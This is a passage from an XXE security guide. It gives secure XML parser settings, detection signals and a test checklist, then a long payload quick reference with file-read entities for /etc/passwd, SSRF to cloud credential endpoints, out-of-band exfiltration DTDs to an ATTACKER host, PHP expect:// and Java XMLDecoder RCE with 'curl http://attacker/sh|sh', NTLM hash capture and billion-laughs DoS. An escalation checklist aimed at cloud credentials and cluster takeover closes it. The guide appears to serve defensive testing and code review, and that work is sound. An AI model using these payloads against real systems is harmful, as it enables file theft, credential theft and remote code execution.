DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

.NET ≥ 4.5.2:

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver   = null
};
using var reader = XmlReader.Create(stream, settings);

Python:

from defusedxml import ElementTree as ET   # blocks DTD by default
root = ET.fromstring(xml_bytes)

or native lxml:

parser = lxml.etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False,
    dtd_validation=False,
    huge_tree=False,
)

PHP (modern):

$doc = new DOMDocument();
$doc->loadXML($xml);     // safe in PHP 8+ — DOCTYPE disabled by default

Avoid LIBXML_NOENT and LIBXML_DTDLOAD unless absolutely required.

Ruby / Nokogiri:

Nokogiri::XML(input)     # safe defaults; do not add .noent or .dtdload

16.3 Network & runtime defences

Egress-filter the app server: block outbound file:// is implicit, block 169.254.169.254, block arbitrary outbound HTTP from parser contexts.
IMDSv2 (AWS) — force HttpTokens=required.
Container egress: default-deny, allowlist specific hostnames only.
WAF rules that block <!DOCTYPE / <!ENTITY on non-XML endpoints and strip them on XML endpoints that don’t need DTD.
Suppress detailed parser errors in production responses (kills error-based variants).
Sandbox file-format processors (ImageMagick policy.xml, LibreOffice profile, SVG rasterisers) in containers without filesystem/network access.

16.4 Logging / detection signals

XML parser error logs mentioning external entity, SYSTEM, DOCTYPE.
Outbound DNS/HTTP from application servers to unknown domains.
Requests that include <!DOCTYPE on endpoints that historically received pure-data XML.
Access to /proc/self/environ, /etc/passwd, /root/.ssh/ by parser processes.
Sudden spikes in heap / CPU — possible billion-laughs.

16.5 Test checklist

Send <!DOCTYPE r [<!ENTITY x "test">]><r>&x;</r> — does test appear? Entities enabled.
Send OOB probe with Collaborator — do callbacks land? External resolution enabled.
Send parameter-entity probe — does the remote DTD get fetched? PE expansion enabled.
Send classic file read — is content reflected?
Send FTP/HTTP exfil via remote DTD — captures data?
Send error payload with bad path — does response include filename fragment?
Send jar:// probe (Java) — does temp file appear?
Send billion-laughs with low iteration — does the service degrade? Back off if yes.
File-format wrappers — SVG avatar, DOCX upload, SAML metadata, RSS feed import.
JSON→XML swap on every JSON endpoint that returns data.

17. Payload Quick Reference

17.1 Detection probes

<!-- Local entity round-trip -->
<!DOCTYPE r [<!ENTITY t "entity-works">]><r>&t;</r>

<!-- OOB via general entity -->
<!DOCTYPE r [<!ENTITY p SYSTEM "http://COLLAB/g">]><r>&p;</r>

<!-- OOB via parameter entity (catches stricter parsers) -->
<!DOCTYPE r [<!ENTITY % p SYSTEM "http://COLLAB/p"> %p;]><r/>

17.2 File read

<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///c:/windows/win.ini">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///proc/self/environ">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "netdoc:///etc/passwd">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "jar:file:///tmp/a.jar!/b.txt">]><r>&x;</r>

17.3 SSRF

<!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://127.0.0.1:6379/">]><r>&x;</r>
<!DOCTYPE r [<!ENTITY x SYSTEM "http://[::1]/">]><r>&x;</r>

Victim:

<!DOCTYPE r [<!ENTITY % dtd SYSTEM "http://ATTACKER/evil.dtd"> %dtd;]><r/>

evil.dtd (HTTP channel):

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER/?x=%file;'>">
%wrap;
%exfil;

evil.dtd (FTP channel for multiline files):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % wrap "<!ENTITY &#x25; exfil SYSTEM 'ftp://a:%file;@ATTACKER/'>">
%wrap;
%exfil;

17.5 Error-based (external DTD)

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; err SYSTEM 'file:///nope/%file;'>">
%eval;
%err;

17.6 Error-based (local DTD — GNOME yelp)

<!DOCTYPE r [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; err SYSTEM &#x27;file:///nope/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;err;
  '>
  %local_dtd;
]>
<r/>

17.7 lxml meow:// bypass

<!DOCTYPE r [
  <!ENTITY % a '
    <!ENTITY % file SYSTEM "file:///tmp/flag.txt">
    <!ENTITY % b "<!ENTITY c SYSTEM &#x27;meow://%file;&#x27;>">
  '>
  %a; %b;
]>
<r>&c;</r>

17.8 XInclude

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

17.9 SVG upload

<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="40">
  <text y="20">&x;</text>
</svg>

17.10 SOAP

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <payload><![CDATA[<!DOCTYPE d [<!ENTITY x SYSTEM "file:///etc/passwd">]><d>&x;</d>]]></payload>
  </soap:Body>
</soap:Envelope>

17.11 PHP RCE via expect

<!DOCTYPE r [<!ENTITY x SYSTEM "expect://id">]><r>&x;</r>

17.12 Java XMLDecoder RCE

<?xml version="1.0"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
  <object class="java.lang.ProcessBuilder">
    <array class="java.lang.String" length="3">
      <void index="0"><string>/bin/sh</string></void>
      <void index="1"><string>-c</string></void>
      <void index="2"><string>curl http://attacker/sh|sh</string></void>
    </array>
    <void method="start"/>
  </object>
</java>

17.13 Windows NetNTLMv2 capture

<!DOCTYPE r [<!ENTITY x SYSTEM "file:////ATTACKER-IP/share/a.jpg">]><r>&x;</r>

17.14 Billion laughs

<!DOCTYPE lolz [
  <!ENTITY a0 "lol">
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<lolz>&a4;</lolz>

17.15 UTF-7 encoded DOCTYPE

<?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ENTITY xxe SYSTEM +ACI-file:///etc/passwd+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

Appendix A — High-value local DTDs

OS / Package	Path	Overridable entity
GNOME yelp	`/usr/share/yelp/dtd/docbookx.dtd`	`ISOamso`, `ISOnum`
fontconfig	`/usr/share/xml/fontconfig/fonts.dtd`	`constant`
Xalan (Java)	`xalan2.jar!/org/apache/xalan/res/XSLTInfo.properties`	various
IBM WebSphere	`$WAS/properties/schemas/j2ee/XMLSchema.dtd`	WebSphere-specific
Microsoft	`C:\Windows\System32\wbem\xml\cim20.dtd`	`SuperClassName`
Red Hat / CentOS	`/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`	—
Tomcat	`jsp-api.jar!/jakarta/servlet/jsp/resources/jspxml.dtd`	—

Full list: https://github.com/GoSecure/dtd-finder/tree/master/list

Appendix B — Fingerprinting checklist before escalating

Does the target reflect XML? → test in-band file read.
Does the parser fetch remote DTDs? → OOB exfil.
Does it return parser errors? → error-based.
Egress-filtered? → local-DTD error-based.
Java fingerprint (Server header, cookie, error trace)? → jar:, netdoc:, XMLDecoder, XSLT RCE.
PHP fingerprint? → php://filter, expect://.
.NET fingerprint? → check XmlResolver / DtdProcessing code patterns; pre-4.5.2 is default-vulnerable.
File-upload feature? → SVG / DOCX / XLSX / SAML / RSS wrapper.
Windows host? → SMB NetNTLM hash capture.
Is the XML in a privileged context (root, cloud IAM, K8s service account)? → pivot to secrets, cloud creds, cluster takeover.

References

Key source articles (from raw/XXE/):

HackTricks — XXE / XEE / XML External Entity (definitive cheat sheet).
GoSecure — Advanced XXE Exploitation workshop.
PortSwigger — Blind XXE labs and writeups.
PVS-Studio — XXE in C# applications (parser defaults, BlogEngine.NET case).
OWASP — XML External Entity Prevention Cheat Sheet.
Detectify Labs — Obscure XXE attacks (Office Open XML).
honoki.net — From blind XXE to root-level file read.
Horizon3.ai — From support ticket to zero day (Xerox FreeFlow Core JMF XXE → SSRF → RCE).
OffSec — CVE-2025-27136 LocalS3 XXE.
pwn.vg — Local file read via error-based XXE (XLIFF).
YesWeHack — Bug bounty XXE guide + Dojo CTF #42 write-up.
HackerOne / Bugcrowd — XXE complete guide.
HLOverflow — XXE-study apps (PHP vulnerable server source).
enjoiz — XXEinjector (Ruby automation).
luisfontes19 — xxexploiter (TS payload + server).
BuffaloWill — oxml_xxe (file-format wrapper generator).
GoSecure — dtd-finder (local-DTD discovery).
Swarm / PT Security — Impossible XXE in PHP (WrapWrap / Lightyear bypass).
Cisco / Akamai / Apache / Grav — vendor advisories for real CVEs referenced above.

Compiled for defensive security research, variant hunting, and secure-code review reference.

Comprehensive XXE Guide#

Table of Contents#

1. Fundamentals#

1.1 The XML DTD primer#

1.2 Entity reference rules that matter for exploitation#

1.3 Why it’s still everywhere#

2. Attack Surface & Entry Points#

2.1 Request-level sinks#

2.2 Code-level sinks#

2.3 Content-Type smuggling#

3. Classic In-Band XXE#

3.1 XInclude — DOCTYPE-less injection#

3.2 Directory listing (Java file:// quirk)#

4. Blind XXE via External DTD#

4.1 Step 1 — prove external connectivity#

4.2 Step 2 — chain a parameter entity for OOB exfil#

4.3 FTP for multi-line files#

4.4 Gopher (legacy Java ≤ 1.7)#

4.5 DNS-only exfiltration#

5. Error-Based XXE#

5.1 External-DTD error variant#

5.2 Purely local (no egress) — local DTD trick#

5.3 GoSecure dtd-finder#

6. Parameter Entities & Local DTD Chains#

6.1 Character-reference encoding#

6.2 Double-encoded payload template#

6.3 lxml “meow://” trick (libxml2 bypass of 5.4.0 hardening)#

7. XXE → SSRF Pivoting#

7.1 Cloud metadata exfil#

7.2 Internal port scan / service enumeration#

7.3 JMF / print orchestration (Xerox FreeFlow Core)#

8. XXE → File Read & Information Disclosure#

8.1 High-value target files (Linux)#

8.2 Windows#

8.3 Binary & non-ASCII file read#

8.4 Source code recovery#

9. XXE → RCE#

9.1 PHP expect:// wrapper#

9.2 Java XMLDecoder deserialization#

9.3 XSLT → Java RCE via Xalan#

9.4 jar: protocol → file-write → RCE chain#

9.5 NetNTLMv2 capture (Windows)#

10. Parser-Specific Behaviors#

10.1 libxml2 (PHP, Python lxml, Ruby Nokogiri, many C/C++ apps)#

10.2 Xerces (Java SAX/DOM)#

10.3 .NET#

10.4 Python lxml#

10.5 Nokogiri (Ruby)#

10.6 Go encoding/xml#

11. XML File-Format Vectors#

11.1 SVG (file upload)#

11.2 Office Open XML (DOCX, XLSX, PPTX)#

11.3 XLIFF (translation files)#

11.4 PDF (XFA forms, XMP metadata)#

11.5 EPUB, ODF#

11.6 SVG / MathML embedded in HTML#

11.7 SOAP envelopes#

11.8 SAML#

11.9 RSS / Atom#

11.10 Android / iOS asset bundles#

12. WAF & Filter Bypasses#

12.1 Encoding#

12.2 Scheme alternatives#

12.3 data:// smuggling#

12.4 Nested general-entity bypass via HTML entities#

12.5 WrapWrap / Lightyear PHP tricks#

13. Denial of Service#

13.1 Billion Laughs#

13.2 Quadratic blowup#

13.3 External resource DoS#

13.4 YAML variant (“Billion Lols” in YAML)#

14. Real-World CVEs & Chains#

14.1 Honoki — blind XXE to root file read#

14.2 Bugcrowd / H1 patterns#

15. Tooling#

15.1 XXEinjector (Ruby)#

15.2 XXExploiter (Node/TS — luisfontes19)#

15.3 BuffaloWill/oxml_xxe#

15.4 GoSecure dtd-finder#

15.5 defusedxml (Python)#